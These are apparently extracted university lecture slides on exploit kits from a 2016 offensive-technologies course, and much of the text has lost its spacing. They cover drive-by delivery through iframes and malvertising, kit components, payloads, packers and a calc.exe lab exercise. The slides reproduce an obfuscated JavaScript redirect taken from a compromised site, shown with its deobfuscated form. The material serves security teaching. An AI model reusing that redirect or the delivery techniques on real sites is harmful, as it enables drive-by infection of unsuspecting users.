offensive technologies fall 2016 - unitrento...26/09/16 1 offensive technologies fall 2016 lecture 3...

26/09/16

1

OffensivetechnologiesFall2016

Lecture3ExploitKitFunctionality

FabioMassacci

26/09/16 FabioMassacci- OffensiveTechnologies 1

Remember this scenario?

• Basicallythat’sthesameideaofanExploitKit– Execute

• 186localfunctions• 15functionsfromexternal sites

– Aggregatestaticcontentsfrom• 676websitesofwhich• 370externalwebsites• 193maybejustimages

– Aggregatedynamiccontentfrom• 8advertisers(atleast)

– Arealloftheseactions“good”ones?

• Justinsteadofadvertsitsendsyouexploits…


26/09/16

2

Remember this scenario?• Basically that’s thesame ideaofthe

exploitserved bytheexploitkit– That’s aprogram containing

• at least 1682instructions– What happens whenwe openit?

• All instructions areexecuted• Not necessarily true that theresult is

displayed– PDFlanguage is Turing Complete

• ANY function canbewritten inPDFlanguage

• OpeningaPDFfilecanseamlesslydisplayanimageandsimultaneouslysolveFermat’s little theorem

• Sothestuff you got is not a“normal”pdf(oranimagesetc.)it issomething that makes you browsercrashandexecute somepartofthepdfthat you don’t really want toexecute


Ekits Technologicalvector

• Reminderofkeyideaofallattacks– Systemisfedbyattackerwithcomputationallyvalidcode(theexploit)disguisedasaninputsto avulnerablecomponent

– Asaresultcodeisexecuted• Exploitkitscenarioisbasicallyinwhich– Systemà user’scomputer– Vulnerablecomponentà browser(oritsplug-ins)contactingawebserver

– Attackerà webserver– Exploità somefilethatbrowsernormallyprocess(egtext,images,scripts,ect.)


26/09/16

3

WhatisanExploitKit?

• Essentiallyitisawebsite– Whencontactedbytheuseritlaunchesoneormoreattacks

againstthewebsite– Iftheattacksaresuccessfulitinfectsthesystems– Someadditionalcode(payload)isthenuploadedonthesystem

• Attacksexploitssoftwarevulnerabilities– Browser,pluginoperatingsystemsetc.– Independentlyfromthevulnerabilitiesthatisactuallyexploited

theygothroughthebrowser

• Thereareseveralofthem.Amongthemostfamous– Blackhole,RIG,Crimepack,Neutrino,BleedingLife,…

FabioMassacci- LucaAllodi

AttackDeliveryMechanisms

• Userreceivestheattackjustbyopeningawebpage– Thepageisnotnecessarilymalicious– Alegitimatepagemightload,unaware,maliciouselements

• Advertthatinrealityismalicious• iFrame insertbytheattacker

• Examplesofwhatyouneedtodo– Clickonalinkincludedinanemail– ClickonavideowithacatchytitleonFacebook– Openafriend’s(oranewssite)webpage– Hoveringwithamouseoversomething

• Fromtheuser’sperspectivethisis“doingnothing”


26/09/16

4

DeliveryMechanisms“inthewild”


Delivery0– StatusBefore Attack

8

Popularwebsitehomepage

Hacker/Exploitkitowner

iFrame

ExploitKit

User

26/09/16

5

Delivery1– CompromiseWebSite

9



iFrame

ExploitKit

User

Pointsto

Deliveryn.1– UserConnects toSite

10



iFrame

ExploitKit

User

Pointsto

26/09/16

6

Deliveryn.2– UserRedirected



iFrame

ExploitKit

User

Pointsto

Deliveryn.3– ExploitDelivered

12



iFrame

ExploitKit

Userattacks

Pointsto

26/09/16

7

CanWe Block It?

• Dowe “breaktheweb”bymaking this thingimpossible?

• Firewall– Idea:block “content”that arrives fromoutsideandis not requested

– Discussion:


Can’t block it…

LucaAllodi



iFrame

ExploitKit

Userattacks

Pointsto

This is theGETresponse.Can’t drop itwithout breakingtheentire web

This is theoriginal GETrequest

26/09/16

8

Howdifficult is that?

• Mozilla development webpage– “Themouseover event is fired when apointing deviceis moved onto theelement that has thelistenerattached oronto one ofits children”

• Code“behind”animage?<img onmouseover="bigImg(this)”src=“http://toughguys.com/belen-b-side.gif”alt=“Belen Rodriguez showsher bestB-side”>

• Enough toadd this bittoapage


Howdifficult is that (contd)

• Userperspective onwhat happened– Nothing happened– “There was this cheeky videobut Ididn’t clickonit”

• Technicalperspective onwhat happened– Moving themouseonacanvas is anaction– Javascript event triggered– Remoteurl loaded– Contentofremoteurl processed bybrower (orappropriateplug-in)

• What if imageis not well formed?– crashtheprocessorandtakeovercontrolfrombrowser


26/09/16

9

CanWe Block It?

• Dowe “breaktheweb”bymaking this thingimpossible?

• Browser– Idea:disable “content”that is not what weexplicitly requested

– Discussion:


AttackVector:SoftwareVulnerability

• Attack“content”nowbeendeliveredtothesystem• “content”isthen(mis)interpretedbythereceiving

softwareas“code”– Receivingsoftwarehasbug(vulnerability)incorrectlyprocessing

“content”– Bugisexploited(hencethename)sosystemexecutes“content”

as ifitwas“code”– Receivingsystemhasnowaytoknowthisisun-intended

• Typicallytwotypesofattack:– Scriptingcode(javascript,VBscript,..)interpretedbythe

browser– Malformedfiles(.swf,.pdf,.applet)loadedbyplugin/thirdparty

software


26/09/16

10

SampleofAttackVectors


AlternativeDeliveryMechanism

• Exploitkitsworksonlyiftheyreceiveconnectionsfromvictims– Links,adverts,iframes,redirections,..

• Ican’thackwebsitesisthereanalternative?• Thereexist(underground)marketstobuysuchconnections

– “Maladvertising”,spam,peopleresellingtheircompromisetolegitimatesite

– Actuallyevenlegitadvertnetworks• Attacker“buys”1000connectionsfromItalianusersthatuse

InternetExplorer7– Usersgetsredirectedtothedomainoftheattackerwhentheyload

theoriginallink• Requiresredirection


26/09/16

11

Traffic Redirection 0– Before Attack

21


ExploitKit

User

Exploitkitowner

iFrame

ADs

Traffic Redirection 1- Acquisition

22


ExploitKit

User

Exploitkitowner

iFrame

ADs

TrafficBroker/Hacker

26/09/16

12

Traffic Redirection 2– Acquisition II

23


ExploitKit

User

Exploitkitowner

iFrame

ADs


Buystraffic

Traffic Redirection n.1-4– UserConnects

24


ExploitKit

Userattacks

Exploitkitowner

iFrame

ADs


Buystraffic

26/09/16

13

CanWe Block It?

• Again,without breakingtheweb• Browserredirection– Idea:we forbid abrowsertoredirect connectionstodifferent url than theone intially specified

• Discussion


Can’t doit

26


ExploitKit

Userattacks

Exploitkitowner

iFrame

ADs


Buystraffic

This functionality is built-inonour Webbased onAdvertisingarevenue streem

26/09/16

14

Finalstep:Payoad Distribution

• Exploitofvulnerabilityonlygivescontroloftheuser’smachinecontrolforabriefinstant– Byitselfthistransientcontroldoesnotyieldmuchvalue– Weneedtomakethiscontrolmoreorlesspermanent– ordelivertothesystemsomethingthat“hasvalue”

• Exploitkitmustdeliver“payload”tothesystem– Example:openingarootshell,requesttodownloadandinstallmalware

• Thepayloadissometimescalledshellcode– Typicallyruninmachinelanguage– Loadeddirectlyinmemoryfromtheattacker– Executedbythesystem


Example Payloads

• After exploitinstall ransomware– Ransomware encrypts diskandowner ofsoftwarecandemand

payment todecrypt– Ransomware does not need tobecontrolled bythesame guy

running theexploitkit• Install Botnet client

– Botnet clientcanbere-sold onthemarket– Serviceofclientcanbedirectly sold for“Booter Services”

• Install Keylogger– Controlremotemachineforpossible re-saleofcaptured

credentials (orsnitching onyou partner)– Forexample creditcards canbeidentified as they are14

numbers withanumber oferror correcting codes


26/09/16

15

Propagationvsoperation

• Strategy1:Highpropagationrate– PRO:severalinfections/unitoftime– AGAINST:Themoresamplesofmalwareinthewild,thehigherthechancestohandasampletosecurityresearchers• moreinfectionsà fasterdetection

• Strategy2:Lowpropagationrate– PRO:

• higherstealthiness• fewerchancesofinfectingasystemalreadyinfectedbyanothermalware

– AGAINST:fewerinfections/unitoftime

LucaAllodi

ExploitKits - Internals

• We now lookat ExploitKits as “softwareartefacts”how dotheylook?– Leakedsourcecodesof30+exploitkits– Vulnerabilityandexploitover70+kits

• OffensiveComponent– Theone responsbile foractually delivering thepayload tothe

connecting users• Defensive Component

– Not justusers connect tothewebsite.Also securitycompaniesdo– Mostly we want toavoid that theweburl hostingtheexploitkitis

blacklisted• ManagementConsole

– This is thereal purpose ofanexploitkit.

26/09/16

16

OffensiveComponent

• Whenthevictimssenditsfirst“GET”thekitwill1. Identifytheversionsoftheandtheoperatingsystem

(88%)2. Checkuserhasnotbeenalreadyinfected(64%)• viaIPchecking• Thisisessentialtoavoiduncontrolledpropagation

3. Checkifsystemisactuallyvulnerable4. Launcha“suitable”attack

• Lesssophisticatedkitslaunchattacksevenifsystemnotvulnerable(36%)

• Otherstrymorethanoneattacktypes


OffensiveComponent:II

• Itisenoughthatoneexploitsucceds forthetake-overtobesuccesful

• Typically10-12exploitsperkit– Recentlyalsoexploitkitswith3-5exploits– Oftennotveryrecent(1-2years)

• Typicalvulnerabilities– AdobeFlash,AcrobatReader,InternetExplorer,Java,altri plug-in


26/09/16

17

DefensiveComponents

• Exploitkitsmsut activelydefendthemselvesagainstAV/webrobots

• Obfuscationofpayloadedelmalware(82%)– Obfuscation+Crypto– Malwarepackers

• BlockIPtoavoidbeind sampledbyAV/Security(78%)• Evasionsfrobots+crawlers (3kitsonly)• Somekitsevencontrolinrela timewhethertheirurl isincludedinpubliclistsofmalwaredomains.


Defensive Components- II


26/09/16

18

DefensiveComponents- III

• AntiVirus softwaretypicallyrecognizesthefootprint(signature)ofamalwareloadedintomemory– ComparesuspiciousfileandDBsignatures– Ifthereisacorrespondence,executionissuspendedor

terminated• Packers→Theyarewhatthenamesaysm “packers”o

“wrappers”aroundthemalwarethatmodifyitssignature– Maintargetis“obfuscationofmalware”– “packedmalware”à differentmemoryfootprintof

downloaded“malware”• Attackercanalsousea“fresh”attackwithslightly

reducedchancesofbeingdetectedbythedefender.


Contentcompromisationexample

• Foundonwebsitetocreateandpublishcustomised onlinepolls[Provos 2006]

• Obfuscatedjavascript code– <SCRIPTlanguage=JavaScript>

functionotqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15="’)";if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>

• Canyoudeobfuscate it?

LucaAllodi

26/09/16

19





• Canyoudeobfuscate it?

LucaAllodi





• Canyoudeobfuscate it?– location.replace(’http://videozfree.com’)

LucaAllodi

26/09/16

20

ManagementConsole


Gartner’s Quadrant perexploitkits


26/09/16

21

Explorationofakit:Crimepack

• “Darky”looks– Mostly because tooldesignerwant tosellitsusage toother parties

– Soimportant tolookatrue “professionalcriminal”

• Actually justasystemtomanage fragmentsofwebpages,files,andconnections


Exploitkit:availableattacks


26/09/16

22

Definitionandinjectionoftheexploitandthecorrespondingshellcode


AdministrativePanel


26/09/16

23

ExploitSelection


Key IdeaofExercise

• You connect directly toexploitkitweb-site– Mustsetupvirtual machinecorresponding towebserversothat it responds toyour requests onaspecific port

• Mustsetup exploitkitsite– Make sure that thewebserverexecutes thecodeoftheexploitkiti.e.that theexploitkitcodeis run when arequest tothat port is made(changeconfiguration file)

– Specify thepayload (calc.exe)andtheexploit• Launch attack– Connecttothewebserveronthespecified port– If attack works your browserwill openacalculator


26/09/16

24

Deliveryn.3– ExploitDelivered

• What you have todo…

• Youjusthavetodoitwhere– theuserrunsona

laptop– theexploitkitruns

onavirtualmachinesonthelaptop

– Thecodeoftheexploitkitisavailableforyoutochangeitssource

47

ExploitKit

Userattacks

Pointsto

Additional Reading• OnCybercrime Surveys andReports

– J.BritoandT.Watkins.Loving thecyberbomb?Thedangers ofthreat inflation incybersecurity policy.HarvardNationalSecurity J.,3(1):39,2011.

– C.Herley.Theplight ofthetargeted attacker inaworldofscale.InProc.ofWEIS’10,2010.

– R.Wash.Folkmodels ofhomecomputersecurity.InProceedings oftheSixthSymposiumonUsable PrivacyandSecurity2010Jul 14(p.11).ACM.

• OnExploitKits– C.Grier etal.Manufacturingcompromise:theemergence ofexploit-as-a-

service.InProc.ofACMCCS’12,pp.821–832,2012– V.Kotov andF.Massacci.Anatomy ofexploitkits.In Proc.ofESSOS’13,pp.181–

196,2013.– N.Nikiforakis,F.Maggi,G.Stringhini,M.Z.Rafique,W.Joosen,C.Kruegel,F.

Piessens,G.Vigna,andS.Zanero.Stranger danger:Exploring theecosystem ofad-based url shortening services.InProc.ofWWW’14,pp.51–62,2014

– S.Lekies,B.Stock,andM.Johns.25million flows later:Large-scaledetectionofdom-based xss.InProc.ofACMCCS’13,pp.1193–1204,2013.


offensive technologies fall 2016 - unitrento...26/09/16 1 offensive technologies fall 2016 lecture 3...

Documents